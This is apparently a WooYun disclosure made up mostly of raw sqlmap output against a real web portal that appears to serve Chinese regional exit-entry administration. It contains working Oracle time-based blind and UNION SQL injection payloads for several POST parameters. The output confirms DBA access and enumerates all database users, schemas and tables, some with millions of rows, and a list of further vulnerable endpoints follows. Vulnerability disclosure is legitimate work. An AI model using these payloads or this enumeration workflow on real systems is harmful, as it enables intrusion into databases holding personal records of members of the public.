WooYun.org

**.**.**.**:8081/tplt/gl2011101612585592.jsp?cid=874

**.**.**.**:8081/webcl/showWssb.jsp (POST)
piid=11111111111111111111&col5=13888888888&querycode1=2717

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: piid
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: piid=11111111111111111111' AND 5906=DBMS_PIPE.RECEIVE_MESSAGE(CHR(1
06)||CHR(90)||CHR(102)||CHR(71),5) AND 'cZxW'='cZxW&col5=13888888888&querycode1=
2717
Place: POST
Parameter: col5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: piid=11111111111111111111&col5=13888888888' AND 9251=DBMS_PIPE.RECE
IVE_MESSAGE(CHR(120)||CHR(113)||CHR(71)||CHR(82),5) AND 'BBQR'='BBQR&querycode1=
2717
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: col5, type: Single quoted string (default)
[1] place: POST, parameter: piid, type: Single quoted string
[q] Quit
> 0
[00:06:29] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[00:06:29] [INFO] fetching current user
[00:06:29] [INFO] resumed: NOTA
current user:    'NOTA'
[00:06:29] [INFO] fetching current database
[00:06:29] [INFO] resumed: NOTA
[00:06:29] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[00:06:29] [INFO] testing if current user is DBA
current user is DBA:    True

database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

Database: NOTA
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| TRIGGER_MESSAGE | 1378479 |
| CRJ_YW_BZJDJGB  | 978587  |
+-----------------+---------+

**.**.**.**:8081/webcl/showWssbList.jsp (POST)
col11=222222222222&col55=13888888888&querycode2=3885

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: col55
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: col11=222222222222&col55=13888888888' UNION ALL SELECT NULL,NULL,NU
LL,CHR(113)||CHR(119)||CHR(113)||CHR(117)||CHR(113)||CHR(119)||CHR(69)||CHR(105)
||CHR(68)||CHR(115)||CHR(119)||CHR(102)||CHR(65)||CHR(86)||CHR(75)||CHR(113)||CH
R(104)||CHR(114)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &querycode2
=3885
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col11=222222222222&col55=13888888888' AND 8334=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(75)||CHR(100)||CHR(77)||CHR(108),5) AND 'rNzb'='rNzb&querycode2=3885
Place: POST
Parameter: col11
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: col11=222222222222' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(1
19)||CHR(113)||CHR(117)||CHR(113)||CHR(79)||CHR(81)||CHR(108)||CHR(80)||CHR(65)|
|CHR(88)||CHR(78)||CHR(76)||CHR(99)||CHR(119)||CHR(113)||CHR(104)||CHR(114)||CHR
(114)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &col55=13888888888&querycode2=38
85
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col11=222222222222' AND 5724=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CH
R(67)||CHR(73)||CHR(105),5) AND 'QTOe'='QTOe&col55=13888888888&querycode2=3885
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: col11, type: Single quoted string (default)
[1] place: POST, parameter: col55, type: Single quoted string
[q] Quit
> 0
[02:28:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[02:28:42] [INFO] fetching current user
current user:    'NOTA'
[02:28:42] [INFO] fetching current database
[02:28:42] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[02:28:42] [INFO] testing if current user is DBA
current user is DBA:    True

database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

Database: HR
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| EMPLOYEES               | 107     |
| DEPARTMENTS             | 27      |
| COUNTRIES               | 25      |
| LOCATIONS               | 23      |
| JOBS                    | 19      |
| JOB_HISTORY             | 10      |
| REGIONS                 | 4       |
+-------------------------+---------+
Database: NOTA
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE         | 14284896 |
| TRIGGER_MESSAGE         | 1378479 |
| CRJ_YW_BZJDJGB          | 978587  |
| PROJECTSMS              | 141888  |
| CRJ_YW_WSSQ_HGTSQXXB    | 57847   |
| CRJ_YW_WSSQ_TWZJBLB     | 57677   |
| CRJ_YW_WSSQ_GXRB        | 34602   |
| CRJ_YW_WSSQ_JTCYB       | 33178   |
| CRJ_YW_WSSQ_QZBLB       | 29193   |
| APPLY_DOC               | 21602   |
| JITTASK                 | 18699   |
| CRJ_YW_WSSQ_YYXXB       | 17721   |
| JITTASKINSTANCE         | 15071   |
| JITTRANSITION           | 14922   |
| "CONDITION"             | 14129   |
| FLOWSARCHIVE            | 14107   |
| WEBFUJIAN               | 13065   |
| JITFUJIAN               | 11657   |
| APPLY_LAWS              | 8117    |
| WEBPROCESSINSTANCE      | 4461    |
| JITPROCESSDATA          | 4251    |
| JITPROCESSDEFINITION    | 4238    |
| PROTYPE_RELATION        | 3915    |
| SHOULI                  | 3813    |
| WORKDATE                | 3652    |
| JITPROCESSINSTANCE      | 3386    |
| PROJECTINFO             | 3271    |
| PROJECTARCHIVES         | 3232    |
| QUJIANTAB               | 3203    |
| DOCUMENTS               | 3104    |
| CRJ_YW_SWDWB            | 2911    |
| CRJ_YW_WSSQ_YQRB        | 1614    |
| LAWS                    | 1210    |
| PROJECTSORT             | 1060    |
| PROJECTANNEX            | 826     |
| CRJ_YW_WSSQ_CXSQXXB     | 590     |
| CRJ_YW_WSSQ_BGJZB       | 332     |
| CRJ_YW_BZJDCXB          | 276     |
| PROJECTINFOMB           | 182     |
| DICTIONARY              | 165     |
| JITVARIABLEDEFINITION   | 108     |
| ADDRESSZD               | 92      |
| CRJ_YW_WSSQ_CXSQJGB     | 84      |
| HANDUPINFO              | 74      |
| PROJECTTBL              | 57      |
| PLAN_TABLE              | 56      |
| CRJ_YW_WSSQ_WGR_ZJSQB   | 53      |
| CRJ_YW_WSSQ_WGR_QZBL_GR | 33      |
| JITFUJIAN2              | 26      |
| CRJ_YW_WSSQ_WGR_XXRB    | 13      |
| JITFORMINFO             | 12      |
| QJTYPE                  | 11      |
| DEALWRONG               | 10      |
| PROJECTSMSDEFINITION    | 7       |
| SCORETYPE               | 5       |
| WEBFORM                 | 4       |
| CHANNEL                 | 3       |
| DUBANPRO                | 3       |
| QJCLASS                 | 3       |
| TOUSUTYPE               | 2       |
| WEBARCHIVES             | 2       |
| WORKTIME_STANDARD       | 1       |
+-------------------------+---------+
Database: WEBOTA
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| IP_TB                   | 106804  |
| LOG_TB                  | 3890    |
| INFO_TB                 | 3144    |
| MID_CID                 | 1223    |
| MANAGER_CHANNEL_TB      | 829     |
| CHANNEL_TB              | 467     |
| WEBFORM                 | 427     |
| CHANNELBRIEF_TB         | 183     |
| MANAGER_TB              | 38      |
| TPLT_TB                 | 25      |
| ROLE_MODULE_TB          | 21      |
| INFO_FUJIAN_TB          | 20      |
| MODULE_TB               | 12      |
| ANSWER_TB               | 11      |
| STYLE_TB                | 8       |
| TPLT_BACKUP_TB          | 7       |
| PARAM_TB                | 6       |
| ROLE_TB                 | 5       |
| VOTE                    | 5       |
| QUESTION_TB             | 4       |
| FILE_TB                 | 3       |
| GUANGGAO_TB             | 3       |
| MANAGER_ROLE_TB         | 3       |
| TPLT_SCHEME_TB          | 2       |
| TPLT_TYPE_TB            | 2       |
| WEATHER_TB              | 2       |
| CONFIG_TB               | 1       |
| FILECLASS_TB            | 1       |
| MANAGER_FILECLASS_TB    | 1       |
| VIDEO_TB                | 1       |
| WEBCOUNTER_TB           | 1       |
+-------------------------+---------+
Database: NOTA_TEMP
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| APPLY_DOC               | 15475   |
| JITTASK                 | 13761   |
| JITTRANSITION           | 10637   |
| "CONDITION"             | 10178   |
| APPLY_LAWS              | 6112    |
| DOCUMENTS               | 3785    |
| WORKDATE                | 3652    |
| JITPROCESSDATA          | 3069    |
| JITPROCESSDEFINITION    | 3056    |
| PROTYPE_RELATION        | 2985    |
| PROJECTINFO             | 2557    |
| LAWS                    | 894     |
| SHOULI                  | 283     |
| PROJECTSORT             | 250     |
| DICTIONARY              | 231     |
| PROJECTANNEX            | 205     |
| FLOWSARCHIVE            | 125     |
| TRIGGER_MESSAGE         | 101     |
| ADDRESSZD               | 92      |
| WEBFUJIAN               | 74      |
| JITVARIABLEDEFINITION   | 61      |
| PLAN_TABLE              | 56      |
| PROJECTTBL              | 48      |
| PROJECTSMS              | 37      |
| JITFUJIAN               | 32      |
| QUJIANTAB               | 31      |
| JITTASKINSTANCE         | 25      |
| WEBPROCESSINSTANCE      | 14      |
| QJTYPE                  | 11      |
| HANDUPINFO              | 7       |
| JITPROCESSINSTANCE      | 7       |
| PROJECTSMSDEFINITION    | 7       |
| JITFORMINFO             | 6       |
| KONGSHEN                | 5       |
| SCORETYPE               | 5       |
| CHANNEL                 | 3       |
| QJCLASS                 | 3       |
| TOUSUTYPE               | 2       |
| DEALWRONG               | 1       |
| NOTSINC                 | 1       |
| WORKTIME_STANDARD       | 1       |
+-------------------------+---------+
Database: WEBOTABASE
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LOG                     | 32640   |
| SYSOP_LOG               | 4165    |
| STRUCTURE               | 2847    |
| STAFF                   | 1497    |
| DEPARTMENT              | 1232    |
| ROLERELATE              | 252     |
| FLOOR_REL               | 28      |
| SYSTEMINFO              | 3       |
| MANAGER                 | 1       |
+-------------------------+---------+

Database: NOTA
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE         | 14284896 |
| TRIGGER_MESSAGE         | 1378479 |
| CRJ_YW_BZJDJGB          | 978587  |
| PROJECTSMS              | 141888  |
==================================
Database: WEBOTABASE
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LOG                     | 32640   |
| SYSOP_LOG               | 4165    |
| STRUCTURE               | 2847    |
| STAFF                   | 1497    |
=================================

**.**.**.**:8081/tplt/gl2011101612585592.jsp?cid=874
**.**.**.**:8081/changchun/second.jsp?cid=1402
**.**.**.**:8081/baishan/second.jsp?cid=917
**.**.**.**:8081/liaoyuan/second.jsp?cid=909
**.**.**.**:8081/siping/second.jsp?cid=1098
**.**.**.**:8081/tonghua/second.jsp?cid=1106
**.**.**.**:8081/songyuan/second.jsp?cid=1211
**.**.**.**:8081/yanbian/second.jsp?cid=1237
**.**.**.**:8081/baicheng/second.jsp?cid=1122